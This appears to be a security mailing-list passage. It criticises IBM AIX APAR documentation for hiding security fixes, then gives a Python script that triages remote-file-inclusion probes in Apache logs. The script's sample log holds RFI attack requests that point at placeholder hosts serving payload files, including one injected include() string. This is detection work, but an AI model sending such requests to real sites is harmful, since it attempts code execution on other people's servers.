Not to be outdone, IBM steps up and gives VDBs a headache.

APAR IZ00988 is sysrouted to APAR IZ01121 and APAR IZ01122. Really IBM, the amount of information common to all three pages is overwhelming. Do you really need a new APAR number issued for component name or level? Can't you just list them all in one APAR and save us time? More importantly, do we need three APAR entries that say a security issue has been fixed and make us dig up the information?

When all is said and done, there are obviously a lot of issues that MAY have security implications, but it's hard to tell based on the information available. We definitely need an AIX guru or IBM rep to clear them up. I'm not holding my breath.

I ran across the following APARs that came back 'Document not found.' The changelog I originally saw them in suggests there are security implications.

IZ00829 RMUSER COMMAND REMOVED PASSWD STANZA FROM /ETC/SECURITY/PASSWD
IY97793 PASSWDEXPIRED MAY RETURN INCORRECT VALUE IF PASSWD IS CORRUPTED
IY96773 FTPD SECURITY ISSUES IN KRB5 ENVIRONMENT
IY95914 RPC.NISPASSWDD DOES NOT USE -C OPTION IN THE CORRECT MANNER
IY95913 YPPASSWD FAILS FOR NIS USER WITH LONG NAME(>8 CHARACTERS)

And finally, one changelog entry that doesn't jibe with the APAR entry.

http://www-1.ibm.com/support/docview.wss?uid=isg1IY97813

Changelog: IY97813 srcmstr crash
APAR: IY97813: NEW FUNCTION
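As an added example for the "RFI BotNet and phpBB 0-day?" thread above (not Noam's Perl script or any list member's code), a small Python triage pass over Apache access-log lines that does what Brian and Noam describe: it pulls out requests whose parameters carry a remote URL, collapses them to unique script/parameter pairs with counts, sets aside the obvious noise (an archive path glued in front of the probe, as in Brian's /pipermail/ example) and tags pairs that match a known-vulnerability table, so that what remains can be reviewed as potential 0-day. The log lines, client addresses, include hosts and the one-entry KNOWN table are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log line; only the client ip and the request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Known (script, parameter) -> public ids. Constructed stub with the one pair
# the thread cites by id; a real table would be fed from a VDB export.
KNOWN = {
    ("cart_content.php", "cart_isp_root"): "CVE-2006-2483 / OSVDB 25523",
}
# A remote URL as a parameter value is the RFI signature itself.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Usual payload shape: a remote .txt, often with a trailing '?' or '??' so
# that whatever the local script appends to the path becomes a query string.
PAYLOAD_RE = re.compile(r"(?:\.txt|\?+)$", re.IGNORECASE)
# A list-archive URL glued in front of the script path can never resolve on
# the scanned host, so such a request is bot noise, not evidence of a vuln.
NOISE_PATH_RE = re.compile(r"/pipermail/.*\.html/", re.IGNORECASE)


def parse_probe(line):
    """Describe an RFI-looking request as a dict, or return None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # keep_blank_values: Joomla-style probes lead with '_REQUEST=&GLOBALS=&'.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if not REMOTE_RE.match(value):
            continue
        return {
            "ip": m.group("ip"),
            "script": parts.path.rsplit("/", 1)[-1],
            "param": key,
            "include_host": urlsplit(value).hostname or "",
            "payload_shape": bool(PAYLOAD_RE.search(value)),
            "archive_noise": bool(NOISE_PATH_RE.search(parts.path)),
        }
    return None


def classify(probe):
    """known: catalogued; noise: mangled path; probe: RFI-shaped payload;
    weak: a URL in a parameter but nothing else (pasted link, redirector...)."""
    if (probe["script"], probe["param"]) in KNOWN:
        return "known"
    if probe["archive_noise"]:
        return "noise"
    if probe["payload_shape"]:
        return "probe"
    return "weak"


def triage(lines):
    """Collapse log lines to unique (script, param) pairs with counts and a class."""
    report = {}
    for line in lines:
        probe = parse_probe(line)
        if probe is None:
            continue
        key = (probe["script"], probe["param"])
        entry = report.setdefault(key, {"class": "noise", "ids": KNOWN.get(key, ""),
                                        "count": 0, "sources": set(), "hosts": set()})
        if entry["class"] == "noise":  # a clean sighting upgrades the class
            entry["class"] = classify(probe)
        entry["count"] += 1
        entry["sources"].add(probe["ip"])
        entry["hosts"].add(probe["include_host"])
    return report


# Constructed sample modelled on the request shapes quoted in the thread;
# addresses and include hosts are documentation ranges, not the real ones.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Mar/2008:06:04:39 +0000] "GET /claroline/phpbb/page_tail.php'
    '?includePath=http://payload.example/id2.txt%3f%3f HTTP/1.1" 404 289 "-" "libwww-perl/5.808"',
    '203.0.113.5 - - [20/Mar/2008:06:04:40 +0000] "GET /squirrelcart/cart_content.php'
    '?cart_isp_root=http://payload.example/id2.txt%3f%3f HTTP/1.1" 404 289 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [20/Mar/2008:06:05:01 +0000] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d='
    'option,com_comprofiler&GLOBALS=&mosConfig_absolute_path=http://other.example/id.txt%3f%3f'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Mar/2008:06:05:02 +0000] "GET /pipermail/vim/2006-October/001080.html'
    '//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D&ddd=http://other.example/sefe.txt??'
    ' HTTP/1.1" 404 289 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Mar/2008:06:05:03 +0000] "GET /claroline/phpbb/page_tail.php'
    '?includePath=http://other.example/id.txt%3f%3f HTTP/1.1" 404 289 "-" "Mozilla/4.0"',
    '192.0.2.9 - - [20/Mar/2008:06:06:00 +0000] "GET /redirect.php?url=http://www.example.org/'
    ' HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [20/Mar/2008:06:06:01 +0000] "GET /pipermail/vim/2008-March/001900.html'
    ' HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (script, param), e in sorted(triage(SAMPLE_LOG).items()):
        print(f'{e["class"]:5} {script}?{param}=  x{e["count"]} '
              f'from {len(e["sources"])} ip(s)  {e["ids"]}')
```

The "weak" bucket is where Noam's first false-positive class (mistyped or double-pasted URLs) lands, so it is worth eyeballing rather than dropping outright.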